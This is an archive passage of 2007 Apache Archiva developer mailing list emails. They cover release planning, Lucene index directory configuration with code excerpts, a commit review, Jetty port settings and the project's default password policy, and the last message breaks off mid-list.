X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO an-out-0708.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 09 Jun 2007 09:30:13 -0700 Received: by an-out-0708.google.com with SMTP id d30so277341and for <[email protected]>; Sat, 09 Jun 2007 09:29:53 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=SzQqbGmqNRlK1wIsj+BjsmrszRmzERuUQHttbVdTIPC0ro33rNUI6KPjHHAW8YMmCpkZtGcfCZ9PxbSyzlhLc/vTi1JMuR7ooCe1tGa88sEFbmOpzWsr7Hw+F7V1Wyknmlbne569JtgHaYLydsCeTz8CUcDTdv4lSa0Xeu2xdOA= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=mrKpneW9AERRlcocNns3SG261G3cfdrJCiwQ0viRHxgEiyTJo74JucQW40QoOQ29IutRU5SE3ljiwvxpkWJ4Ns8ApvjsWtuBFlwA4jnoae8xNIf58AZfn0TKoUqoaHijplEx2DioMFm2+pip/4EfrcNXEaXOUG08BeniRRKWCBA= Received: by 161.129.204.104 with SMTP id n9mr2410208ane.1181406592380; Sat, 09 Jun 2007 09:29:52 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Sat, 9 Jun 2007 09:29:52 -0700 (PDT) Message-ID: <[email protected]> Date: Sat, 9 Jun 2007 09:29:52 -0700 From: "Wendy Smoak" <[email protected]> To: "Archiva Developers List" <[email protected]> Subject: Planning for 1.0-alpha-2 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline X-Virus-Checked: Checked by ClamAV on apache.org How does the weekend of June 23rd sound for another Archiva alpha release? Joakim, are you already planning to do one before then? Any thoughts on how many of the 110 issues marked for 1.0-alpha-2 in jira could actually make it in that two-week time frame? Thanks, Wendy From [email protected] Mon Jun 11 13:26:49 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 65286 invoked from network); 11 Jun 2007 13:26:48 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 11 Jun 2007 13:26:48 -0000 Received: (qmail 38848 invoked by uid 500); 11 Jun 2007 13:26:51 -0000 Delivered-To: [email protected] Received: (qmail 38803 invoked by uid 500); 11 Jun 2007 13:26:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 38785 invoked by uid 99); 11 Jun 2007 13:26:51 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 11 Jun 2007 06:26:50 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO an-out-0708.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 11 Jun 2007 06:26:46 -0700 Received: by an-out-0708.google.com with SMTP id d30so376742and for <[email protected]>; Mon, 11 Jun 2007 06:26:26 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=CbBKUP05fiWBK2A+xsre1EzVFOEdBzTpauzSrHmAwP9yXkDQroMQr6pMP8PZgKoomoMeeJ/M0pof51BTy0s63iySsHSZCJgJd1+YysRQRDdFLRtYxA7t/FYdnXyLAUDUtr+BDTFS3E5zUmKyCm53UgGj/PNyLJvR5R4dzUwA5t4= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=Ozsp6g20MLT1wIGFqCXdpaJaobZ3AGNr0Yu7fsf/OmK8tWWNoesB0fSSHkxGlUyFfvdthlDvmO2JkNbd/srvrCA7N95M3lT3ySX44iB9eseOQj+InagyMXRBA1PZdL1ofER1wX8r+hKl+73Gsa7ew9IzwKvAEUa2tsP0pb7bvt8= Received: by 161.129.204.104 with SMTP id n9mr3283859ane.1181568385397; Mon, 11 Jun 2007 06:26:25 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Mon, 11 Jun 2007 06:26:25 -0700 (PDT) Message-ID: <[email protected]> Date: Mon, 11 Jun 2007 06:26:25 -0700 From: "Wendy Smoak" <[email protected]> To: "Archiva Developers List" <[email protected]> Subject: Location of index files in 1.0? MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline X-Virus-Checked: Checked by ClamAV on apache.org Does Archiva still use Lucene for indexing? I can't find the configuration for the index directory in a reasonably recent version. It used to be <indexPath> in archiva.xml. If so, where is the index stored now? (And how do I move it?) Thanks, -- Wendy From [email protected] Mon Jun 11 16:44:13 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 64558 invoked from network); 11 Jun 2007 16:44:13 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 11 Jun 2007 16:44:13 -0000 Received: (qmail 49047 invoked by uid 500); 11 Jun 2007 16:44:16 -0000 Delivered-To: [email protected] Received: (qmail 49010 invoked by uid 500); 11 Jun 2007 16:44:16 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 49001 invoked by uid 99); 11 Jun 2007 16:44:16 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 11 Jun 2007 09:44:16 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,MIME_HTML_ONLY X-Spam-Check-By: apache.org Received-SPF: neutral (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO mail.sventech.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 11 Jun 2007 09:44:11 -0700 Received: from mail.sventech.com (localhost.localdomain [161.129.204.104]) by mail.sventech.com (Postfix) with ESMTP id BF4984809D for <[email protected]>; Mon, 11 Jun 2007 16:43:49 +0000 (UTC) Received: from [161.129.204.104] (c-71-59-8-58.hsd1.ga.comcast.net [161.129.204.104]) by mail.sventech.com (Postfix) with ESMTP id 534DA48020 for <[email protected]>; Mon, 11 Jun 2007 16:43:49 +0000 (UTC) Message-ID: <[email protected]> Date: Mon, 11 Jun 2007 12:50:39 -0400 From: Joakim Erdfelt <[email protected]> User-Agent: Thunderbird 161.129.204.104 (X11/20070501) MIME-Version: 1.0 To: [email protected] Subject: Re: Location of index files in 1.0? References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Scanned: ClamAV using ClamSMTP X-Virus-Checked: Checked by ClamAV on apache.org <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta content="text/html;charset=ISO-8859-1" http-equiv="Content-Type"> </head> <body bgcolor="#ffffff" text="#000000"> Wendy Smoak wrote: <blockquote cite="mid:[email protected]" type="cite">Does Archiva still use Lucene for indexing?&nbsp; I can't find the <br> configuration for the index directory in a reasonably recent version. <br> It used to be &lt;indexPath&gt; in archiva.xml. <br> <br> If so, where is the index stored now? (And how do I move it?) <br> <br> Thanks, <br> </blockquote> <br> Archiva 1.0 and index file storage.<br> <br> <u>How it works:</u><br> <br> There are 2 modules in play.<br> <tt>archiva-indexer<br> archiva-configuration</tt><br> <br> In <tt>archiva-indexer</tt> there is an interface called...<br> &nbsp; <a href="http://maven.apache.org/archiva/1.0/apidocs/org/apache/maven/archiva/indexer/RepositoryContentIndexFactory.html"><tt>org.apache.maven.archiva.indexer.RepositoryContentIndexFactory</tt></a><br> With an default implementation ...<br> &nbsp; <a href="http://maven.apache.org/archiva/1.0/apidocs/org/apache/maven/archiva/indexer/lucene/LuceneRepositoryContentIndexFactory.html"><tt>org.apache.maven.archiva.indexer.lucene.LuceneRepositoryContentIndexFactory</tt></a><tt>&nbsp; <a href="http://maven.apache.org/archiva/1.0/xref/org/apache/maven/archiva/indexer/lucene/LuceneRepositoryContentIndexFactory.html">(xref)</a></tt><br> which is responsible for setting up the various indexes.<br> <br> The index is per-repository (this is intentional, to allow for a security around the repository to allow/deny a search based on roles, etc...)<br> <br> The index directory is calculated using the following chunk of code (found in <a href="http://maven.apache.org/archiva/1.0/xref/org/apache/maven/archiva/indexer/lucene/LuceneRepositoryContentIndexFactory.html#69"><tt>LuceneRepositoryContentIndexFactory</tt></a>)<br> <br> <pre> <font color="#0000ff">/**</font> <font color="#0000ff"> *</font><font color="#6a5acd"> Obtain the index directory for the provided repository.</font><font color="#0000ff"> </font> <font color="#0000ff"> * </font> <font color="#0000ff"> * </font><font color="#6a5acd">@param</font><font color="#008b8b"> repository</font><font color="#0000ff"> the repository to obtain the index directory from.</font> <font color="#0000ff"> * </font><font color="#6a5acd">@param</font><font color="#008b8b"> indexId</font><font color="#0000ff"> the id of the index</font> <font color="#0000ff"> * </font><font color="#6a5acd">@return</font><font color="#0000ff"> the directory to put the index into.</font> <font color="#0000ff"> */</font> <font color="#2e8b57"><b>private</b></font> File toIndexDir( ArchivaRepository repository, String indexId ) { <font color="#a52a2a"><b>if</b></font> ( !repository.isManaged() ) { <font color="#a52a2a"><b>throw</b></font> <font color="#a52a2a"><b>new</b></font> IllegalArgumentException( <font color="#ff00ff">"Only supports managed repositories."</font> ); } <font color="#0000ff">// Attempt to get the specified indexDir in the configuration first.</font> RepositoryConfiguration repoConfig = configuration.getConfiguration().findRepositoryById( repository.getId() ); File indexDir; <font color="#a52a2a"><b>if</b></font> ( repoConfig == <font color="#ff00ff">null</font> ) { <font color="#0000ff">// No configured index dir, use the repository path instead.</font> String repoPath = repository.getUrl().getPath(); indexDir = <font color="#a52a2a"><b>new</b></font> File( repoPath, <font color="#ff00ff">".index/"</font> + indexId + <font color="#ff00ff">"/"</font> ); } <font color="#a52a2a"><b>else</b></font> { <font color="#0000ff">// Use configured index dir.</font> String repoPath = repoConfig.getIndexDir(); <font color="#a52a2a"><b>if</b></font> ( StringUtils.isBlank( repoPath ) ) { repoPath = repository.getUrl().getPath(); <font color="#a52a2a"><b>if</b></font> ( !repoPath.endsWith( <font color="#ff00ff">"/"</font> ) ) { repoPath += <font color="#ff00ff">"/"</font>; } repoPath += <font color="#ff00ff">".index"</font>; } indexDir = <font color="#a52a2a"><b>new</b></font> File( repoPath, <font color="#ff00ff">"/"</font> + indexId + <font color="#ff00ff">"/"</font> ); } <font color="#a52a2a"><b>return</b></font> indexDir; }</pre> This means that if the indexDir is specified in the configuration for this repository, it uses that as the 'topmost' directory for the indexes.<br> <br> There are 3 types of indexes.<br> <ul> <li><a href="http://maven.apache.org/archiva/1.0/apidocs/org/apache/maven/archiva/indexer/bytecode/package-summary.html">Bytecode</a> - Holds the classnames, public method signatures, and packages names.</li> <li><a href="http://maven.apache.org/archiva/1.0/apidocs/org/apache/maven/archiva/indexer/filecontent/package-summary.html">FileContent</a> - holds a raw file content index (for those files flagged as 'indexable' in the repository scan)</li> <li><a href="http://maven.apache.org/archiva/1.0/apidocs/org/apache/maven/archiva/indexer/hashcodes/package-summary.html">Hashcode</a> - holds the file reference, as well as artifact reference, complete with md5 and sha1 hashcodes.<br> </li> </ul> (Some $HOME/.m2/archiva.xml examples)<br> Lets look at what happens with a simple repository definition.<br> <pre> <font color="#008b8b">&lt;</font><font color="#008b8b">repository</font><font color="#008b8b">&gt;</font> <font color="#008b8b">&lt;</font><font color="#008b8b">id</font><font color="#008b8b">&gt;</font>snapshots<font color="#008b8b">&lt;/id&gt;</font> <font color="#008b8b">&lt;</font><font color="#008b8b">name</font><font color="#008b8b">&gt;</font>Managed Snapshots Repository<font color="#008b8b">&lt;/name&gt;</font> <font color="#008b8b">&lt;</font><font color="#008b8b">url</font><font color="#008b8b">&gt;</font><a class="moz-txt-link-freetext" href="file:/home/joakim/java/archiva/snapshots/">file:/home/joakim/java/archiva/snapshots/</a><font color="#008b8b">&lt;/url&gt;</font> <font color="#008b8b">&lt;</font><font color="#008b8b">snapshots</font><font color="#008b8b">&gt;</font>true<font color="#008b8b">&lt;/snapshots&gt;</font> <font color="#008b8b">&lt;/repository&gt;</font></pre> This is will result in the following directory structure ...<br> <br> <tt>[joakim@monolith .index]$ pwd<br> /home/joakim/java/archiva/snapshots/.index<br> [joakim@monolith .index]$ ls -la<br> total 16<br> drwxr-xr-x 4 joakim joakim 4096 2007-05-29 15:45 .<br> drwxr-xr-x 6 joakim joakim 4096 2007-05-25 14:34 ..<br> </tt><tt>drwxr-xr-x 2 joakim joakim 4096 2007-05-29 16:20 bytecode<br> </tt><tt>drwxr-xr-x 2 joakim joakim 4096 2007-05-29 15:59 filecontent<br> drwxr-xr-x 2 joakim joakim 4096 2007-05-29 16:10 hashcodes<br> [joakim@monolith .index]$ </tt><br> <br> Notice, this is the default directory that is created for the lucene indexes.<br> It can be changed, observe the following setting (found only in the archiva.xml file ATM, oddly, no GUI for this setting yet exists.&nbsp; Not sure how that slipped thru)<br> <pre> <font color="#008b8b">&lt;</font><font color="#008b8b">repository</font><font color="#008b8b">&gt;</font> <font color="#008b8b">&lt;</font><font color="#008b8b">id</font><font color="#008b8b">&gt;</font>corporate<font color="#008b8b">&lt;/id&gt;</font> <font color="#008b8b">&lt;</font><font color="#008b8b">name</font><font color="#008b8b">&gt;</font>Managed Corporate Repository<font color="#008b8b">&lt;/name&gt;</font> <font color="#008b8b">&lt;</font><font color="#008b8b">url</font><font color="#008b8b">&gt;</font><a class="moz-txt-link-freetext" href="file:/home/joakim/java/archiva/corporate/">file:/home/joakim/java/archiva/corporate/</a><font color="#008b8b">&lt;/url&gt;</font> <font color="#008b8b">&lt;</font><font color="#008b8b">indexDir</font><font color="#008b8b">&gt;</font>/opt/indexes/corporate/<font color="#008b8b">&lt;/indexDir&gt;</font> <font color="#008b8b">&lt;/repository&gt;</font></pre> This sets the index directory for the corporate repository to be in <tt>/opt/indexes/corporate/</tt> .<br> Remember, this is only a base directory for the indexes.&nbsp; Let Archiva and Lucene manage the individual directories under this base directory.<br> <br> Hope this helps.<br> <br> Hmm.&nbsp; This should be put in the documentation. <span class="moz-smiley-s14"><span> O:-) </span></span><br> (flags this as a todo, and continues work on <a href="http://jira.codehaus.org/browse/MRM-410">MRM-410</a>)<br> <pre class="moz-signature" cols="72">-- - Joakim Erdfelt Committer and PMC Member, Apache Maven Archiva Developer <a class="moz-txt-link-abbreviated" href="mailto:[email protected]">[email protected]</a> </pre> </body> </html> From [email protected] Fri Jun 15 00:52:31 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 68930 invoked from network); 15 Jun 2007 00:52:31 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 15 Jun 2007 00:52:31 -0000 Received: (qmail 49755 invoked by uid 500); 15 Jun 2007 00:52:34 -0000 Delivered-To: [email protected] Received: (qmail 49724 invoked by uid 500); 15 Jun 2007 00:52:33 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 49715 invoked by uid 99); 15 Jun 2007 00:52:33 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 14 Jun 2007 17:52:33 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO mx06.syd.iprimus.net.au) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 14 Jun 2007 17:52:29 -0700 X-IronPort-Anti-Spam-Filtered: true X-IronPort-Anti-Spam-Result: AgAAAFJ/cUY6shPG/2dsb2JhbAAN X-IronPort-AV: E=Sophos;i="4.16,422,1175436000"; d="scan'208";a="51452791" Received: from 198.091.dsl.syd.iprimus.net.au (HELO [161.129.204.104]) ([161.129.204.104]) by smtp06.syd.iprimus.net.au with ESMTP; 15 Jun 2007 10:52:07 +1000 Mime-Version: 1.0 (Apple Message framework v752.3) In-Reply-To: <[email protected]> References: <[email protected]> Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: 7bit From: Brett Porter <[email protected]> Subject: Re: svn commit: r547385 - /maven/archiva/trunk/archiva-base/archiva-xml-tools/src/main/java/org/apache/maven/archiva/xml/XMLWriter.java Date: Fri, 15 Jun 2007 10:51:55 +1000 To: [email protected] X-Mailer: Apple Mail (2.752.3) X-Virus-Checked: Checked by ClamAV on apache.org Isn't the problem instead that there's no finally block closing the writer? On 15/06/2007, at 6:08 AM, [email protected] wrote: > Author: jmcconnell > Date: Thu Jun 14 13:08:06 2007 > New Revision: 547385 > > URL: http://svn.apache.org/viewvc?view=rev&rev=547385 > Log: > flush the outputwriter so its all cleaned up > > Modified: > maven/archiva/trunk/archiva-base/archiva-xml-tools/src/main/ > java/org/apache/maven/archiva/xml/XMLWriter.java > > Modified: maven/archiva/trunk/archiva-base/archiva-xml-tools/src/ > main/java/org/apache/maven/archiva/xml/XMLWriter.java > URL: http://svn.apache.org/viewvc/maven/archiva/trunk/archiva-base/ > archiva-xml-tools/src/main/java/org/apache/maven/archiva/xml/ > XMLWriter.java?view=diff&rev=547385&r1=547384&r2=547385 > ====================================================================== > ======== > --- maven/archiva/trunk/archiva-base/archiva-xml-tools/src/main/ > java/org/apache/maven/archiva/xml/XMLWriter.java (original) > +++ maven/archiva/trunk/archiva-base/archiva-xml-tools/src/main/ > java/org/apache/maven/archiva/xml/XMLWriter.java Thu Jun 14 > 13:08:06 2007 > @@ -41,6 +41,7 @@ > OutputFormat outputFormat = > OutputFormat.createPrettyPrint(); > org.dom4j.io.XMLWriter xmlwriter = new > org.dom4j.io.XMLWriter( writer, outputFormat ); > xmlwriter.write( doc ); > + xmlwriter.flush(); > } > catch ( IOException e ) > { > From [email protected] Mon Jun 18 01:08:25 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 29460 invoked from network); 18 Jun 2007 01:08:22 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Jun 2007 01:08:22 -0000 Received: (qmail 21726 invoked by uid 500); 18 Jun 2007 01:08:04 -0000 Delivered-To: [email protected] Received: (qmail 18442 invoked by uid 500); 18 Jun 2007 01:07:48 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 14352 invoked by uid 99); 18 Jun 2007 01:06:59 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 17 Jun 2007 18:06:58 -0700 Received-SPF: neutral (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO mx05.syd.iprimus.net.au) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 17 Jun 2007 18:06:04 -0700 X-IronPort-Anti-Spam-Filtered: true X-IronPort-Anti-Spam-Result: AgAAAN92dUY6sj47/2dsb2JhbAANglc X-IronPort-AV: E=Sophos;i="4.16,432,1175436000"; d="scan'208,217";a="51512393" Received: from 59.133.dsl.syd.iprimus.net.au (HELO [161.129.204.104]) ([161.129.204.104]) by smtp05.syd.iprimus.net.au with ESMTP; 18 Jun 2007 11:05:08 +1000 Mime-Version: 1.0 (Apple Message framework v752.3) To: [email protected] Message-Id: <[email protected]> Content-Type: multipart/alternative; boundary=Apple-Mail-8062796280 References: <[email protected]> From: Brett Porter <[email protected]> Subject: Fwd: Jetty port can be pre-configured in conf/plexus.xml Date: Mon, 18 Jun 2007 11:05:04 +1000 X-Mailer: Apple Mail (2.752.3) X-Virus-Checked: Checked by ClamAV on apache.org --Apple-Mail-8062796280 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed Pretty sure this was submitted as a patch to Archiva too - but probably out of date now. Might be worth reviewing what Wendy did to apply here too? Begin forwarded message: > From: "Wendy Smoak" <[email protected]> > Date: 18 June 2007 8:34:36 AM > To: [email protected] > Subject: Jetty port can be pre-configured in conf/plexus.xml > Reply-To: [email protected] > List-Id: <continuum-dev.maven.apache.org> > Message-Id: > <[email protected]> > > The Jetty port for Continuum can now be pre-configured in conf/ > plexus.xml: > > <component> > <role>org.codehaus.plexus.contextualizer.Contextualizer</role> > <role-hint>jettyConfiguration</role-hint> > > <implementation>org.codehaus.plexus.contextualizer.DefaultContextualiz > er</implementation> > <configuration> > <contextValues> > <jetty.port>9090</jetty.port> > </contextValues> > </configuration> > </component> > > This does introduce a snapshot dependency on plexus-contextualizer, > which will need to be released before the next Continuum milestone. > > Thanks to Olivier Lamy for the patch and Emmanuel for general > encouragement; see http://jira.codehaus.org/browse/CONTINUUM-1184 for > more info. I think there's a similar patch available for both Archiva > and Maven Enterprise. > > -- > Wendy --Apple-Mail-8062796280-- From [email protected] Mon Jun 18 01:42:00 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 42150 invoked from network); 18 Jun 2007 01:41:59 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Jun 2007 01:41:59 -0000 Received: (qmail 60545 invoked by uid 500); 18 Jun 2007 01:42:00 -0000 Delivered-To: [email protected] Received: (qmail 60511 invoked by uid 500); 18 Jun 2007 01:42:00 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 60492 invoked by uid 99); 18 Jun 2007 01:42:00 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 17 Jun 2007 18:42:00 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO an-out-0708.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 17 Jun 2007 18:41:55 -0700 Received: by an-out-0708.google.com with SMTP id d30so373649and for <[email protected]>; Sun, 17 Jun 2007 18:41:35 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=SJx0bEyVmqOjhyFGqB2OCXvq7SPA2hyPHtJXHpqKJrueqD5sSHlts3kmfmxx/pjUMgEqEVaDT2LLAD9m6YjAwTnc2MS/VLhh94K/U4slwJOjsW5PH4UIW8mza+vwb5j5pLW6yL/Ssb5vOJ5NX73fABExq/OecdSV5IfmkhMjjuo= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=RFCUXBPJdaoek4ryZRT+6rUEIFNHoGigJdFmscDmY5gchsjjShvBee6z+OgdckYDCYJ/y8Opj1nkjOFdJBAIQzzP1X3XOJTdhpBZDM7hhFQObUpIW1kvn2SV8StFyWzTT7Z1oTsN8/W4r85jbu2U71oRGnCw+zKvDK6KqrzBoYk= Received: by 161.129.204.104 with SMTP id g11mr2358334anc.1182130894656; Sun, 17 Jun 2007 18:41:34 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Sun, 17 Jun 2007 18:41:34 -0700 (PDT) Message-ID: <[email protected]> Date: Sun, 17 Jun 2007 18:41:34 -0700 From: "Wendy Smoak" <[email protected]> To: [email protected] Subject: Re: Jetty port can be pre-configured in conf/plexus.xml In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org On 6/17/07, Brett Porter <[email protected]> wrote: > Pretty sure this was submitted as a patch to Archiva too - but > probably out of date now. Might be worth reviewing what Wendy did to > apply here too? It's this one: http://jira.codehaus.org/browse/MRM-290 All part of my plan to be able to pre-configure everything in xml. :) Right now if you want to run Archiva on other than the default port, you have to start it once so the app will unpack, edit a file, and restart. -- Wendy From [email protected] Mon Jun 18 10:13:23 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 96908 invoked from network); 18 Jun 2007 10:13:21 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Jun 2007 10:13:21 -0000 Received: (qmail 41727 invoked by uid 500); 18 Jun 2007 10:13:25 -0000 Delivered-To: [email protected] Received: (qmail 41681 invoked by uid 500); 18 Jun 2007 10:13:24 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 41672 invoked by uid 99); 18 Jun 2007 10:13:24 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 18 Jun 2007 03:13:24 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO mail.sventech.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 18 Jun 2007 03:13:20 -0700 Received: from mail.sventech.com (localhost.localdomain [161.129.204.104]) by mail.sventech.com (Postfix) with ESMTP id 1AAA74809C for <[email protected]>; Mon, 18 Jun 2007 10:12:59 +0000 (UTC) Received: from [161.129.204.104] (c-71-59-8-58.hsd1.ga.comcast.net [161.129.204.104]) by mail.sventech.com (Postfix) with ESMTP id BF2254809B for <[email protected]>; Mon, 18 Jun 2007 10:12:58 +0000 (UTC) Message-ID: <[email protected]> Date: Mon, 18 Jun 2007 06:12:55 -0400 From: Joakim Erdfelt <[email protected]> User-Agent: Thunderbird 161.129.204.104 (X11/20070501) MIME-Version: 1.0 To: [email protected] Subject: Default Password Controls in Archiva ( MRM-229 / MRM-225 ) Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Scanned: ClamAV using ClamSMTP X-Virus-Checked: Checked by ClamAV on apache.org There has been some controversy on the closing of MRM-229 and MRM-225, I feel that they should remain closed. The defaults that you see here are not archiva specific, and are the same defaults you see in all other redback applications (including continuum) The fact that you can change these by adding them to one of the following user controlled files should be enough ... ${user.home}/.m2/security.properties ${user.home}/.m2/archiva.properties ${appserver.base}/conf/security.properties ${appserver.home}/conf/security.properties The defaults are sane to some people, and not sane to others. If we can't agree to a set of defaults for Archiva by Thursday morning, then the above defaults stick, and the work for this should sit on the redback UI side for easy reconfigurability. Yes, before you start arguing about me closing them as won't fix ... Yes, I am taking an iron fist approach to jiras MRM-229 and MRM-225. If you wanted them changed, you should have commented in the jiras sooner. Those jiras were open for 6 months, noone offered any suggestions on values, and the ability to change them without a recompile exists. In my world, that means there is no problem. Onto the technical details ... In Archiva we use redback for our security. It has several ways to enforce password complexity (uniformly) across all password proposals. First, lets look at what can be changed. ( list from http://maven.apache.org/archiva/guides/security-configuration.html ) security.policy.allowed.login.attempt=3 This is a policy setting that allows for only 3 login attempts before the account is locked out. Currently set to 3 attempts. security.policy.password.previous.count=6 This sets the total number of previous passwords to record. security.policy.password.rule.reuse.enabled=true This sets the password rule on reuse, preventing reusing any of the previous passwords on the account. Currently turned on, and will check the previous password list for the last 6 passwords. security.policy.password.expiration.days=90 This sets the total amount of time a password is valid, in days. Forcing the user to change their password when this interval is up. Currently set for 90 day password expiration. security.policy.password.rule.alphanumeric.enabled=false Password rule that ensures the password is a mix of alpha and numeric characters. Currently turned off security.policy.password.rule.alphacount.enabled=true security.policy.password.rule.alphacount.minimum=1 Password rule that ensure the password contains a minimum number of alphabetic (a-zA-Z) characters. Currently turned on and requires 1 alphabetic character to exist in the proposed password. security.policy.password.rule.numericalcount.enabled=true 